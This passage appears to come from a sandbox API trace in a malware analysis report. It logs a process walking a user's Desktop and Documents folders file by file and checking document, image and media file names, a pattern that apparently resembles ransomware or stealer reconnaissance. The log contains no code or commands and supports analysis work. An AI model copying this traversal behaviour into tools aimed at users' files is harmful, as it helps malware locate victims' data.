dwMilliseconds=0x0) returned 0x102 [0067.948] lstrlenW (lpString="0jGywidWNCSY.odp") returned 16 [0067.948] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\*", lpFindFileData=0x5c5ff0 | out: lpFindFileData=0x5c5ff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7d1e0, ftCreationTime.dwHighDateTime=0x1d5e36f, ftLastAccessTime.dwLowDateTime=0xcebcce40, ftLastAccessTime.dwHighDateTime=0x1d5e459, ftLastWriteTime.dwLowDateTime=0xcebcce40, ftLastWriteTime.dwHighDateTime=0x1d5e459, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bee70 [0067.948] FindNextFileW (in: hFindFile=0x5bee70, lpFindFileData=0x5c5ff0 | out: lpFindFileData=0x5c5ff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7d1e0, ftCreationTime.dwHighDateTime=0x1d5e36f, ftLastAccessTime.dwLowDateTime=0xcebcce40, ftLastAccessTime.dwHighDateTime=0x1d5e459, ftLastWriteTime.dwLowDateTime=0xcebcce40, ftLastWriteTime.dwHighDateTime=0x1d5e459, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.949] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.949] FindNextFileW (in: hFindFile=0x5bee70, lpFindFileData=0x5c5ff0 | out: lpFindFileData=0x5c5ff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2de87f0, ftCreationTime.dwHighDateTime=0x1d5e1e8, ftLastAccessTime.dwLowDateTime=0xd48867f0, ftLastAccessTime.dwHighDateTime=0x1d5d845, ftLastWriteTime.dwLowDateTime=0xd48867f0, ftLastWriteTime.dwHighDateTime=0x1d5d845, nFileSizeHigh=0x0, nFileSizeLow=0x2f26, dwReserved0=0x0, dwReserved1=0x0, cFileName="afHQetjycFA rZ3.jpg", cAlternateFileName="AFHQET~1.JPG")) returned 1 [0067.949] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.949] lstrlenW (lpString="afHQetjycFA rZ3.jpg") returned 19 [0067.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\*", lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50559420, ftCreationTime.dwHighDateTime=0x1d5e7aa, ftLastAccessTime.dwLowDateTime=0x1eab1920, ftLastAccessTime.dwHighDateTime=0x1d5e13a, ftLastWriteTime.dwLowDateTime=0x1eab1920, ftLastWriteTime.dwHighDateTime=0x1d5e13a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5beeb0 [0067.949] FindNextFileW (in: hFindFile=0x5beeb0, lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50559420, ftCreationTime.dwHighDateTime=0x1d5e7aa, ftLastAccessTime.dwLowDateTime=0x1eab1920, ftLastAccessTime.dwHighDateTime=0x1d5e13a, ftLastWriteTime.dwLowDateTime=0x1eab1920, ftLastWriteTime.dwHighDateTime=0x1d5e13a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.949] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.949] FindNextFileW (in: hFindFile=0x5beeb0, lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb021b70, ftCreationTime.dwHighDateTime=0x1d5dc8b, ftLastAccessTime.dwLowDateTime=0x1c6bcc60, ftLastAccessTime.dwHighDateTime=0x1d5e5ac, ftLastWriteTime.dwLowDateTime=0x1c6bcc60, ftLastWriteTime.dwHighDateTime=0x1d5e5ac, nFileSizeHigh=0x0, nFileSizeLow=0x9991, dwReserved0=0x0, dwReserved1=0x0, cFileName="71ic.mkv", cAlternateFileName="")) returned 1 [0067.949] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.949] lstrlenW (lpString="71ic.mkv") returned 8 [0067.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\*", lpFindFileData=0x5c8c30 | out: lpFindFileData=0x5c8c30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe43a450, ftCreationTime.dwHighDateTime=0x1d5dc83, ftLastAccessTime.dwLowDateTime=0x9621650, ftLastAccessTime.dwHighDateTime=0x1d5df18, ftLastWriteTime.dwLowDateTime=0x9621650, ftLastWriteTime.dwHighDateTime=0x1d5df18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5b93b0 [0067.950] FindNextFileW (in: hFindFile=0x5b93b0, lpFindFileData=0x5c8c30 | out: lpFindFileData=0x5c8c30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe43a450, ftCreationTime.dwHighDateTime=0x1d5dc83, ftLastAccessTime.dwLowDateTime=0x9621650, ftLastAccessTime.dwHighDateTime=0x1d5df18, ftLastWriteTime.dwLowDateTime=0x9621650, ftLastWriteTime.dwHighDateTime=0x1d5df18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.950] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.950] FindNextFileW (in: hFindFile=0x5b93b0, lpFindFileData=0x5c8c30 | out: lpFindFileData=0x5c8c30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9890130, ftCreationTime.dwHighDateTime=0x1d5e480, ftLastAccessTime.dwLowDateTime=0x79b677a0, ftLastAccessTime.dwHighDateTime=0x1d5d975, ftLastWriteTime.dwLowDateTime=0x79b677a0, ftLastWriteTime.dwHighDateTime=0x1d5d975, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="A0pEXOj7Gs4t_mh1Da", cAlternateFileName="A0PEXO~1")) returned 1 [0067.950] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.950] lstrlenW (lpString="A0pEXOj7Gs4t_mh1Da") returned 18 [0067.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\s3pxmkuntuL8-\\A0pEXOj7Gs4t_mh1Da\\*", lpFindFileData=0x5c9e90 | out: lpFindFileData=0x5c9e90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9890130, ftCreationTime.dwHighDateTime=0x1d5e480, ftLastAccessTime.dwLowDateTime=0x79b677a0, ftLastAccessTime.dwHighDateTime=0x1d5d975, ftLastWriteTime.dwLowDateTime=0x79b677a0, ftLastWriteTime.dwHighDateTime=0x1d5d975, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5b93f0 [0067.950] FindNextFileW (in: hFindFile=0x5b93f0, lpFindFileData=0x5c9e90 | out: lpFindFileData=0x5c9e90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9890130, ftCreationTime.dwHighDateTime=0x1d5e480, ftLastAccessTime.dwLowDateTime=0x79b677a0, ftLastAccessTime.dwHighDateTime=0x1d5d975, ftLastWriteTime.dwLowDateTime=0x79b677a0, ftLastWriteTime.dwHighDateTime=0x1d5d975, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.951] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.951] FindNextFileW (in: hFindFile=0x5b93f0, lpFindFileData=0x5c9e90 | out: lpFindFileData=0x5c9e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48d344d0, ftCreationTime.dwHighDateTime=0x1d5e48b, ftLastAccessTime.dwLowDateTime=0x53180e30, ftLastAccessTime.dwHighDateTime=0x1d5e436, ftLastWriteTime.dwLowDateTime=0x53180e30, ftLastWriteTime.dwHighDateTime=0x1d5e436, nFileSizeHigh=0x0, nFileSizeLow=0xdecf, dwReserved0=0x0, dwReserved1=0x0, cFileName="6ZMlFvDrBeGhhz.m4a", cAlternateFileName="6ZMLFV~1.M4A")) returned 1 [0067.951] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.951] lstrlenW (lpString="6ZMlFvDrBeGhhz.m4a") returned 18 [0067.951] FindClose (in: hFindFile=0x5b93f0 | out: hFindFile=0x5b93f0) returned 1 [0067.951] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9e90 | out: hHeap=0x580000) returned 1 [0067.951] FindNextFileW (in: hFindFile=0x5b93b0, lpFindFileData=0x5c8c30 | out: lpFindFileData=0x5c8c30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x276ea260, ftCreationTime.dwHighDateTime=0x1d5e6c7, ftLastAccessTime.dwLowDateTime=0x36e52d50, ftLastAccessTime.dwHighDateTime=0x1d5e39c, ftLastWriteTime.dwLowDateTime=0x36e52d50, ftLastWriteTime.dwHighDateTime=0x1d5e39c, nFileSizeHigh=0x0, nFileSizeLow=0x2b51, dwReserved0=0x0, dwReserved1=0x0, cFileName="BdJNs8uPR9tdwxrXW1.jpg", cAlternateFileName="BDJNS8~1.JPG")) returned 1 [0067.951] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.951] lstrlenW (lpString="BdJNs8uPR9tdwxrXW1.jpg") returned 22 [0067.951] FindClose (in: hFindFile=0x5b93b0 | out: hFindFile=0x5b93b0) returned 1 [0067.951] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8c30 | out: hHeap=0x580000) returned 1 [0067.951] FindNextFileW (in: hFindFile=0x5beeb0, lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93c9f70, ftCreationTime.dwHighDateTime=0x1d5e132, ftLastAccessTime.dwLowDateTime=0xbd850b30, ftLastAccessTime.dwHighDateTime=0x1d5d7f5, ftLastWriteTime.dwLowDateTime=0xbd850b30, ftLastWriteTime.dwHighDateTime=0x1d5d7f5, nFileSizeHigh=0x0, nFileSizeLow=0x3c0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wXHSOw.mp3", cAlternateFileName="")) returned 1 [0067.951] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.951] lstrlenW (lpString="wXHSOw.mp3") returned 10 [0067.951] FindClose (in: hFindFile=0x5beeb0 | out: hFindFile=0x5beeb0) returned 1 [0067.952] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c75e0 | out: hHeap=0x580000) returned 1 [0067.952] FindNextFileW (in: hFindFile=0x5bee70, lpFindFileData=0x5c5ff0 | out: lpFindFileData=0x5c5ff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50559420, ftCreationTime.dwHighDateTime=0x1d5e7aa, ftLastAccessTime.dwLowDateTime=0x1eab1920, ftLastAccessTime.dwHighDateTime=0x1d5e13a, ftLastWriteTime.dwLowDateTime=0x1eab1920, ftLastWriteTime.dwHighDateTime=0x1d5e13a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yusR_ZDYxpM7ORa", cAlternateFileName="YUSR_Z~1")) returned 0 [0067.952] FindClose (in: hFindFile=0x5bee70 | out: hFindFile=0x5bee70) returned 1 [0067.952] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5ff0 | out: hHeap=0x580000) returned 1 [0067.952] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc243a0b0, ftCreationTime.dwHighDateTime=0x1d5df74, ftLastAccessTime.dwLowDateTime=0x3ec9f230, ftLastAccessTime.dwHighDateTime=0x1d5e33d, ftLastWriteTime.dwLowDateTime=0x3ec9f230, ftLastWriteTime.dwHighDateTime=0x1d5e33d, nFileSizeHigh=0x0, nFileSizeLow=0xfc52, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="_BPZWLkK WG.rtf", cAlternateFileName="_BPZWL~1.RTF")) returned 1 [0067.952] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.952] lstrlenW (lpString="_BPZWLkK WG.rtf") returned 15 [0067.952] FindClose (in: hFindFile=0x5a4060 | out: hFindFile=0x5a4060) returned 1 [0067.952] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0067.952] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8f040c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8f040c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0067.952] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.952] lstrlenW (lpString="Documents") returned 9 [0067.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8f040c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8f040c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName=".", cAlternateFileName="")) returned 0x5a4060 [0067.952] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8f040c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8f040c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="..", cAlternateFileName="")) returned 1 [0067.952] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.952] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e206ab0, ftCreationTime.dwHighDateTime=0x1d5e14d, ftLastAccessTime.dwLowDateTime=0x4ba549f0, ftLastAccessTime.dwHighDateTime=0x1d5e793, ftLastWriteTime.dwLowDateTime=0x4ba549f0, ftLastWriteTime.dwHighDateTime=0x1d5e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="3p8DX", cAlternateFileName="")) returned 1 [0067.953] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.953] lstrlenW (lpString="3p8DX") returned 5 [0067.953] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\*", lpFindFileData=0x5ca680 | out: lpFindFileData=0x5ca680*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e206ab0, ftCreationTime.dwHighDateTime=0x1d5e14d, ftLastAccessTime.dwLowDateTime=0x4ba549f0, ftLastAccessTime.dwHighDateTime=0x1d5e793, ftLastWriteTime.dwLowDateTime=0x4ba549f0, ftLastWriteTime.dwHighDateTime=0x1d5e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bee70 [0067.953] FindNextFileW (in: hFindFile=0x5bee70, lpFindFileData=0x5ca680 | out: lpFindFileData=0x5ca680*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e206ab0, ftCreationTime.dwHighDateTime=0x1d5e14d, ftLastAccessTime.dwLowDateTime=0x4ba549f0, ftLastAccessTime.dwHighDateTime=0x1d5e793, ftLastWriteTime.dwLowDateTime=0x4ba549f0, ftLastWriteTime.dwHighDateTime=0x1d5e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.953] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.953] FindNextFileW (in: hFindFile=0x5bee70, lpFindFileData=0x5ca680 | out: lpFindFileData=0x5ca680*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd363dd50, ftCreationTime.dwHighDateTime=0x1d5e286, ftLastAccessTime.dwLowDateTime=0xee912650, ftLastAccessTime.dwHighDateTime=0x1d5de44, ftLastWriteTime.dwLowDateTime=0xee912650, ftLastWriteTime.dwHighDateTime=0x1d5de44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5ixNamHgIormo", cAlternateFileName="5IXNAM~1")) returned 1 [0067.953] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.953] lstrlenW (lpString="5ixNamHgIormo") returned 13 [0067.953] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\*", lpFindFileData=0x5c85e8 | out: lpFindFileData=0x5c85e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd363dd50, ftCreationTime.dwHighDateTime=0x1d5e286, ftLastAccessTime.dwLowDateTime=0xee912650, ftLastAccessTime.dwHighDateTime=0x1d5de44, ftLastWriteTime.dwLowDateTime=0xee912650, ftLastWriteTime.dwHighDateTime=0x1d5de44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5beeb0 [0067.953] FindNextFileW (in: hFindFile=0x5beeb0, lpFindFileData=0x5c85e8 | out: lpFindFileData=0x5c85e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd363dd50, ftCreationTime.dwHighDateTime=0x1d5e286, ftLastAccessTime.dwLowDateTime=0xee912650, ftLastAccessTime.dwHighDateTime=0x1d5de44, ftLastWriteTime.dwLowDateTime=0xee912650, ftLastWriteTime.dwHighDateTime=0x1d5de44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.953] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.953] FindNextFileW (in: hFindFile=0x5beeb0, lpFindFileData=0x5c85e8 | out: lpFindFileData=0x5c85e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x514b0cf0, ftCreationTime.dwHighDateTime=0x1d5d8de, ftLastAccessTime.dwLowDateTime=0xf9a62710, ftLastAccessTime.dwHighDateTime=0x1d5e057, ftLastWriteTime.dwLowDateTime=0xf9a62710, ftLastWriteTime.dwHighDateTime=0x1d5e057, nFileSizeHigh=0x0, nFileSizeLow=0x6234, dwReserved0=0x0, dwReserved1=0x0, cFileName="0n7wI7aSjGu0lAAgvw.pdf", cAlternateFileName="0N7WI7~1.PDF")) returned 1 [0067.953] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.953] lstrlenW (lpString="0n7wI7aSjGu0lAAgvw.pdf") returned 22 [0067.953] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\*", lpFindFileData=0x5ca9e0 | out: lpFindFileData=0x5ca9e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95912050, ftCreationTime.dwHighDateTime=0x1d5dff7, ftLastAccessTime.dwLowDateTime=0xdd683100, ftLastAccessTime.dwHighDateTime=0x1d5df6d, ftLastWriteTime.dwLowDateTime=0xdd683100, ftLastWriteTime.dwHighDateTime=0x1d5df6d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c7208 [0067.954] FindNextFileW (in: hFindFile=0x5c7208, lpFindFileData=0x5ca9e0 | out: lpFindFileData=0x5ca9e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95912050, ftCreationTime.dwHighDateTime=0x1d5dff7, ftLastAccessTime.dwLowDateTime=0xdd683100, ftLastAccessTime.dwHighDateTime=0x1d5df6d, ftLastWriteTime.dwLowDateTime=0xdd683100, ftLastWriteTime.dwHighDateTime=0x1d5df6d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.954] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.954] FindNextFileW (in: hFindFile=0x5c7208, lpFindFileData=0x5ca9e0 | out: lpFindFileData=0x5ca9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fa31650, ftCreationTime.dwHighDateTime=0x1d5e680, ftLastAccessTime.dwLowDateTime=0x37d1e370, ftLastAccessTime.dwHighDateTime=0x1d5e33d, ftLastWriteTime.dwLowDateTime=0x37d1e370, ftLastWriteTime.dwHighDateTime=0x1d5e33d, nFileSizeHigh=0x0, nFileSizeLow=0x13d1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="239DQPphtG6.ods", cAlternateFileName="239DQP~1.ODS")) returned 1 [0067.954] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.954] lstrlenW (lpString="239DQPphtG6.ods") returned 15 [0067.954] FindClose (in: hFindFile=0x5c7208 | out: hFindFile=0x5c7208) returned 1 [0067.954] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca9e0 | out: hHeap=0x580000) returned 1 [0067.954] FindNextFileW (in: hFindFile=0x5beeb0, lpFindFileData=0x5c85e8 | out: lpFindFileData=0x5c85e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x758ab470, ftCreationTime.dwHighDateTime=0x1d5d916, ftLastAccessTime.dwLowDateTime=0xaabe3a90, ftLastAccessTime.dwHighDateTime=0x1d5dc22, ftLastWriteTime.dwLowDateTime=0xaabe3a90, ftLastWriteTime.dwHighDateTime=0x1d5dc22, nFileSizeHigh=0x0, nFileSizeLow=0xc3fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Q6lYRBb7f.rtf", cAlternateFileName="Q6LYRB~1.RTF")) returned 1 [0067.954] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.954] lstrlenW (lpString="Q6lYRBb7f.rtf") returned 13 [0067.954] FindClose (in: hFindFile=0x5beeb0 | out: hFindFile=0x5beeb0) returned 1 [0067.954] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c85e8 | out: hHeap=0x580000) returned 1 [0067.954] FindNextFileW (in: hFindFile=0x5bee70, lpFindFileData=0x5ca680 | out: lpFindFileData=0x5ca680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed6f62b0, ftCreationTime.dwHighDateTime=0x1d5db0f, ftLastAccessTime.dwLowDateTime=0xb5274b40, ftLastAccessTime.dwHighDateTime=0x1d5e7f6, ftLastWriteTime.dwLowDateTime=0xb5274b40, ftLastWriteTime.dwHighDateTime=0x1d5e7f6, nFileSizeHigh=0x0, nFileSizeLow=0x8fcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5mRP4R-vP.pdf", cAlternateFileName="5MRP4R~1.PDF")) returned 1 [0067.954] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.954] lstrlenW (lpString="5mRP4R-vP.pdf") returned 13 [0067.955] FindClose (in: hFindFile=0x5bee70 | out: hFindFile=0x5bee70) returned 1 [0067.955] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0067.955] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dfd80b0, ftCreationTime.dwHighDateTime=0x1d56823, ftLastAccessTime.dwLowDateTime=0xe2703610, ftLastAccessTime.dwHighDateTime=0x1d5aaa8, ftLastWriteTime.dwLowDateTime=0xe2703610, ftLastWriteTime.dwHighDateTime=0x1d5aaa8, nFileSizeHigh=0x0, nFileSizeLow=0x1793, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="47X6.xlsx", cAlternateFileName="47X6~1.XLS")) returned 1 [0067.955] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.955] lstrlenW (lpString="47X6.xlsx") returned 9 [0067.955] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x5c8c30, ftCreationTime.dwLowDateTime=0x5d2da8, ftCreationTime.dwHighDateTime=0x1e206ab0, ftLastAccessTime.dwLowDateTime=0x1d5e14d, ftLastAccessTime.dwHighDateTime=0x4ba549f0, ftLastWriteTime.dwLowDateTime=0x1d5e793, ftLastWriteTime.dwHighDateTime=0x4ba549f0, nFileSizeHigh=0x1d5e793, nFileSizeLow=0xdc20b860, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="", cAlternateFileName="6PIpYfq2Z8IiuJꝍ⸁")) returned 0xffffffff [0067.956] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c75e0 | out: hHeap=0x580000) returned 1 [0067.956] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0067.956] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.956] lstrlenW (lpString="My Pictures") returned 11 [0067.985] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x5c8c30, ftCreationTime.dwLowDateTime=0x5be700, ftCreationTime.dwHighDateTime=0x56da8134, ftLastAccessTime.dwLowDateTime=0x39bde93a, ftLastAccessTime.dwHighDateTime=0xc41d3f0b, ftLastWriteTime.dwLowDateTime=0xa44210de, ftLastWriteTime.dwHighDateTime=0xcb1547cc, nFileSizeHigh=0xcd4b1281, nFileSizeLow=0xaea0e9dc, dwReserved0=0x7371289, dwReserved1=0x6b41d860, 